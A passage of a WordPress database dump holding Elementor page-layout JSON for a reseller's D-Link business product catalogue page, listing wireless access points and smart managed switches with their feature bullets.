Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7670,3424,'_elementor_version','2.5.14'),(7671,3424,'_elementor_edit_mode','builder'),(7674,3425,'_wp_page_template','template-fullwidth.php'),(7675,3425,'_elementor_template_type','post'),(7676,3425,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ed243d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"284\",\"right\":\"284\",\"bottom\":\"284\",\"left\":\"284\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4eb9a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"db46566\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"69\",\"right\":\"69\",\"bottom\":\"69\",\"left\":\"69\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"864ef7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361},\"image_size\":\"medium\",\"image_custom_dimension\":{\"width\":\"1000\",\"height\":\"1000\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b8d278c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"802.11ac Wave 2 wireless, up to 1.75 Gbps\\n\\nMU-MIMO with beamforming\\n\\nBand steering\\n\\nGigabit PoE-capable LAN port\\n\\nAP Array utility support\\n\\nFree D-Link Central WiFiManager\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6ad865a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"254\",\"right\":\"254\",\"bottom\":\"254\",\"left\":\"254\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a79c898\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">Enjoy High-performance Wireless Connectivity<\\/h4><p style=\\\"text-align: left;\\\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><h4 style=\\\"text-align: center;\\\">MU-MIMO with Beamforming<\\/h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><h4 style=\\\"text-align: center;\\\">Multiple Operational Modes<\\/h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"704cbac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"7\",\"right\":\"7\",\"bottom\":\"7\",\"left\":\"7\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>Support Central WiFi Manager to configure and manage multiple AP<\\/p><center>[maxbutton id=\\\"6\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a9771aa\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"394708f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<\\/p><p>Suitable for virtualization, cloud services and server-to-server applications<\\/p><p>D-link Green Technology conserves energy by powering down unused ports<\\/p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<\\/p><p>Support G.8032 ERPS to achieve high reliability and network stability<\\/p><p>802.1X port based authentication, for authentication through external RADIUS servers<\\/p><p>Support D-Link Network Assistant Utility to simplifies the configuration<\\/p><p>Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><center>[maxbutton id=\\\"6\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<\\/p><p>Suitable for virtualization, cloud services and server-to-server applications<\\/p><p>D-link Green Technology conserves energy by powering down unused ports<\\/p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<\\/p><p>Support G.8032 ERPS to achieve high reliability and network stability<\\/p><p>802.1X port based authentication, for authentication through external RADIUS servers<\\/p><p>Support D-Link Network Assistant Utility to simplifies the configuration<\\/p><p>Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4e739a4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"6\",\"right\":\"6\",\"bottom\":\"6\",\"left\":\"6\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<\\/p><p>Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<\\/p><p>Support IEEE 802.1Q VLAN traffic segregation<\\/p><p>Auto Surveillance VLAN for easy integration with IP-based surveillance systems<\\/p><p>Loopback detection (LBD) and broadcast storm control to avoid network downtime<\\/p><p>Quality of Service (QOS) and bandwidth control to ensure smooth operation<\\/p><p>Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e75b16a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":93,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"0a878f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9ec8985\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":494,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"7a7732d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":29},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G 